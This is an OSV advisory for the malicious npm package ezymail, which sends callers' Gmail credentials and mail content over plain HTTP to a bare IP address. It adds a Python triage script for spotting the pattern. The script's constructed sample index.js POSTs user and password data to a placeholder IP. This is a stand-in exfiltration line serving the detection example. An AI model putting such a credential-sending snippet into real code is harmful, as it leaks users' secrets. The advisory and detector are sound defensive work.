MAL-2026-4557

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ezymail/MAL-2026-4557.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4557
Published
2026-05-20T02:05:58Z
Modified
2026-05-26T06:02:31.379516767Z
Summary
Malicious code in ezymail (npm)
Details


Source: amazon-inspector (ea463f516048086ec4acfc2733edc9561dac749d19c2e47381fc170c451cd53c)

The package advertises itself as a Gmail/SMTP sender library. The README documents that callers pass their SMTP user and pass (Gmail App Password) to a send() function that talks SMTP/TLS directly to the user's mail server. In reality, index.js (the package main) does not use the bundled lib/mailer.js SMTP implementation at all. Instead, send() spreads the caller-supplied data (including user, pass, from, to, subject, and body) into a JSON payload and POSTs it to http://54.90.254.81:3000/send over cleartext HTTP (index.js lines 7-22). lib/mailer.js exists as decoy code matching the README's 'How It Works' section but is only imported by server.js, the attacker's relay server, never by the package main. Every consumer following the documented usage hands their Gmail address and App Password — plus all recipient addresses and message content — to a bare-IP endpoint over plaintext HTTP on first call to the package's advertised API.
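The two red flags in the description above, a package main that POSTs caller data to a cleartext HTTP endpoint on a bare IP, and bundled "decoy" code that the main entry never imports, are both cheap to check statically before a package is installed. The following triage script is an added example written for this page; it is not code from the ezymail package, from OSV, or from the Amazon Inspector source. It works on an in-memory dict of file contents so it runs offline; the sample files are constructed to mirror the described layout, and the endpoint IP 192.0.2.10 (a TEST-NET documentation address) is a placeholder, not the indicator from the advisory.

```python
"""Static triage for an unpacked npm package: flag cleartext http:// endpoints
with literal-IP hosts, and list bundled JS files unreachable from the main entry."""
import ipaddress
import json
import posixpath
import re
from typing import Dict, List

# Constructed sample package mirroring the advisory's layout (hypothetical code,
# not the real package): main POSTs credentials to a bare-IP HTTP endpoint while
# lib/mailer.js is decoy code that nothing in the main entry requires.
SAMPLE_FILES: Dict[str, str] = {
    "package.json": '{"name": "example-mailer", "main": "index.js"}',
    "index.js": """
const http = require('http');
function send(opts) {
  // user, pass, from, to, subject, body are all spread into the payload
  const payload = JSON.stringify({ ...opts });
  const req = http.request('http://192.0.2.10:3000/send', { method: 'POST' });
  req.end(payload);
}
module.exports = { send };
""",
    "lib/mailer.js": """
const tls = require('tls');
function smtpSend({ host, user, pass }) { return tls.connect(465, host); }
module.exports = { smtpSend };
""",
}

# Matches http(s) URLs; host may be a bracketed IPv6 literal or a plain token.
URL_RE = re.compile(
    r"""(?P<scheme>https?)://(?P<host>\[[^\]]+\]|[^\s'"`/:]+)(?::\d+)?(?:/[^\s'"`]*)?"""
)
# Only relative requires matter for reachability inside the package itself.
REQUIRE_RE = re.compile(r"""require\(\s*['"](\.[^'"]+)['"]\s*\)""")


def find_cleartext_ip_endpoints(source: str) -> List[str]:
    """Return every http:// URL in `source` whose host is a literal IP address."""
    hits = []
    for m in URL_RE.finditer(source):
        if m.group("scheme") != "http":
            continue  # TLS endpoints are not the cleartext-exfiltration pattern
        host = m.group("host").strip("[]")
        try:
            ipaddress.ip_address(host)
        except ValueError:
            continue  # hostname, not a bare IP
        hits.append(m.group(0))
    return hits


def reachable_from_main(files: Dict[str, str], main: str) -> set:
    """Follow relative require() calls from `main` and return the reachable file set."""
    seen, stack = set(), [posixpath.normpath(main)]
    while stack:
        f = stack.pop()
        if f in seen or f not in files:
            continue
        seen.add(f)
        base = posixpath.dirname(f)
        for spec in REQUIRE_RE.findall(files[f]):
            target = posixpath.normpath(posixpath.join(base, spec))
            for cand in (target, target + ".js", posixpath.join(target, "index.js")):
                if cand in files:
                    stack.append(cand)
                    break
    return seen


def triage(files: Dict[str, str]) -> Dict[str, object]:
    """Run both checks over a package given as {path: contents}."""
    main = json.loads(files.get("package.json", "{}")).get("main", "index.js")
    js_files = sorted(p for p in files if p.endswith(".js"))
    endpoints = {p: find_cleartext_ip_endpoints(files[p]) for p in js_files}
    reached = reachable_from_main(files, main)
    return {
        "cleartext_ip_endpoints": {p: u for p, u in endpoints.items() if u},
        "unreached_js_files": [p for p in js_files if p not in reached],
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_FILES), indent=2))
```

To use it on a real tarball, unpack `npm pack <name>` output and build the dict from the `package/` directory; a non-empty `cleartext_ip_endpoints` in the file named by `main`, combined with bundled modules that `main` never reaches, is the combination the advisory describes and warrants a manual read of the main entry before anything is installed.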

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-05-20T02:40:01Z",
            "versions": [
                "2.0.2"
            ],
            "sha256": "68368df4bdb4b3db2be822a508ff596ca7af0f74c0cbf9e8137426a66933900e",
            "id": "IN-MAL-2026-003429",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:37.543316798Z"
        },
        {
            "import_time": "2026-05-26T05:51:20.842940988Z",
            "versions": [
                "2.0.8"
            ],
            "sha256": "73ac73ac3571e19c5124da7423f66b9de2d99956ea07518b430d0a6393716424",
            "id": "IN-MAL-2026-003804",
            "source": "amazon-inspector",
            "modified_time": "2026-05-21T12:27:01Z"
        },
        {
            "modified_time": "2026-05-20T02:05:58Z",
            "versions": [
                "2.0.6"
            ],
            "sha256": "a10e677af3dda40bc569ecdac08d36a73fc29fbdf1ba170538076a83cbab263e",
            "id": "IN-MAL-2026-003391",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:33.179096491Z"
        },
        {
            "import_time": "2026-05-26T05:50:38.969613583Z",
            "versions": [
                "2.0.4"
            ],
            "sha256": "daae0def10869ec69e0029757598c30dd99b3f27a2e38b5e84fc356a55de8dd8",
            "id": "IN-MAL-2026-003441",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T02:57:13Z"
        },
        {
            "modified_time": "2026-05-20T02:39:11Z",
            "versions": [
                "2.0.5"
            ],
            "sha256": "ea463f516048086ec4acfc2733edc9561dac749d19c2e47381fc170c451cd53c",
            "id": "IN-MAL-2026-003428",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:37.435057222Z"
        }
    ]
}
References
Credits

Affected packages

npm / ezymail

Package

Affected ranges

Affected versions

2.*
2.0.2
2.0.4
2.0.5
2.0.6
2.0.8

Database specific

indicators
{
    "evidence_files": [
        {
            "sha256": "6fabbe628e089526a9429dec39a88d07626346dd76a4ad3d1fc932cc6c283db9",
            "tlsh": "10f050e6905256830f35e676f7d6b905f754623f74008803bbbc41491ff16145151dcc",
            "path": "index.js"
        }
    ],
    "package_integrity": [
        {
            "filename": "ezymail-2.0.2.tgz",
            "hashes": {
                "sha512_sri": "sha512-jn3rOJmZieko/ryT0CUXHuL0t+6SgN16j0Qg5nu34avqbFm7K1NsKTWgUZ8tqwOQx54sMgUwp1nYRIDzIuro+g==",
                "sha1": "f30ec9b8eb8166d00b5d5cb41b5577e8d8428133"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ezymail/MAL-2026-4557.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]